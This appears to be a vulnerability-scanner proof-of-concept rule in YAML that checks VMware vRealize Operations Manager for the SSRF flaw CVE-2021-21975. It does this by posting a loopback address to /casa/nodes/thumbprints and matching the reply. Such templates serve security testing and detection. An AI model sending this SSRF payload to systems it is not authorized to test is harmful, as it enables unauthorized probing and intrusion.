name: poc-yaml-vmware-vrealize-cve-2021-21975-ssrf
rules:
  - method: POST
    path: /casa/nodes/thumbprints
    headers:
      Content-Type: application/json
    body: |
      ["127.0.0.1:443/ui/"]
    follow_redirects: true
    expression: |
      response.status == 200 && response.body.bcontains(bytes("vRealize Operations Manager"))
detail:
  author: Loneyer
  links:
    - https://www.vmware.com/security/advisories/VMSA-2021-0004.html